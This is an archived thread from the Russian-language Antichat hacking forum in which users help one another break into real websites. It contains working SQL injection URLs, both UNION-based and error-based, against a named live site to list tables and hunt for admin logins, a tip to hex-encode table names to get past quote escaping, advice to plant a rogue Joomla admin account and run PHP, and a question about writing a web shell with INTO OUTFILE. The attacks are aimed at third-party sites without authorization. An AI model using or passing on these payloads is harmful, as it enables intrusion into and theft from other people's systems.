ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.12.2011, 14:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
49472
Репутация:
0
|
|
Нашел слепую скулю в cms Nautilus, делать полный дамп - долго, муторно и не нужно. Подскажите, в какой таблице лежат логины и пассы... поиск ничего не дал
|
|
|
|
11.01.2012, 06:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
5209
Репутация:
0
|
|
Доброго всем дня, движок стоит interspire shopping cart, каким образом можно определить версию, которая установленна в данный момент?
|
|
|
|
13.01.2012, 06:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
5209
Репутация:
0
|
|
Сообщение от S-J
S-J said:
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..
пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...
с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
Создай себе админа в бд, зайди в админку, и установи модуль mod_php, он всё выводить должен.
Если будет резать код при сохранении, просто зайди в настройку пользователей, выбери своего пользователя, и отключи редактор.
|
|
|
|
14.01.2012, 13:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
подскажите в чём дело.. Ситуация такая, сделав запрос такого вида
_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,table_name,4,5,6,7,8,9,10,11% 20from%20information_schema.tables%20limit%2029,1--
я получаю название таблицы "usedboard", теперь хочу прочитать содержание этой таблицы, делаю запрос такого вида
_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,column_name,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='usedboard' LIMIT 1,1 --
поидеи как я читал этот запрос должен мне показать содерживое таблицы "usedboard", но вместо этого он мне выкидывает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'usedboard\' LIMIT 1,1 --' at line 1"
такая проблема не только с этим пациентам, с десяток разных сайтов перепробовал неполучается прочитать и ошибки не везде одинаковые пишет.
P.S. только начинаю осваивать данное дело, тапками не кидаться
|
|
|
|
14.01.2012, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от muljtik
muljtik said:
P.S. только начинаю осваивать данное дело, тапками не кидаться
Возможно в другой БД твоя таблица, подбери так:
Код:
Code:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((select+concat(table_schema,0x2e,table_name,0x00)+from+information_schema.columns+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Потом from+db.table
|
|
|
|
14.01.2012, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Возможно в другой БД твоя таблица, подбери так:
Код:
Code:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((select+concat(table_schema,0x2e,table_name,0x00)+from+information_schema.columns+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Потом from+db.table Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида
------------------------
Наугад переберал запросы вида
http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,id,4,5,6,7,8,9,10,11+from+use dboard+limit+1,1--
пытался найти мне нужное поле, попал только на одно существующие "ID", все не правельные выводились ошибкой "Unknown column 'login' in 'field list'", так почему же у меня неполучается прочитать какие поля существуют в usedboard
|
|
|
|
14.01.2012, 14:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от None
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида
почти правильный, у тебя там на сайте magic_quotes_gpc = on поэтому нужно избегать ковычки, нужно хексить имя таблицы, т.е. сейчас у тебя так:
... where table_name='usedboard' LIMIT 1,1 --
а нужно
... where table_name=0x75736564626f617264 LIMIT 1,1 --
в мане все есть, тем более ошибка сама намекает на проблему
зы предугадывая ход твоих мыслей, онлайн декодировщик в хекс http://www.string-functions.com/string-hex.aspx
зыы по поводу запроса от Ereee, это error based техника, ман по ней гуглится легко, но лучше начни с основ.
|
|
|
|
14.01.2012, 15:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
3622
Репутация:
0
|
|
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..
trololoman96 я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск
прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?
ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров
-362+union+select+1,...
362+union+select+1,...
362+and(1=2)+union+select+1,...
null+union+select+1,...
так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
|
|
|
|
14.01.2012, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от muljtik
muljtik said:
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..
trololoman96
я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск
прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?
ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров
-362+union+select+1,...
362+union+select+1,...
362+and(1=2)+union+select+1,...
null+union+select+1,...
так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
/thread43966.html
|
|
|
|
15.01.2012, 10:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
761
Репутация:
0
|
|
Ребят подскажите sql иньекции для dle 7.3 дабы она старая думаю вас незатруднит)
ну или фак по взлому мож кто кинут с меня +!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
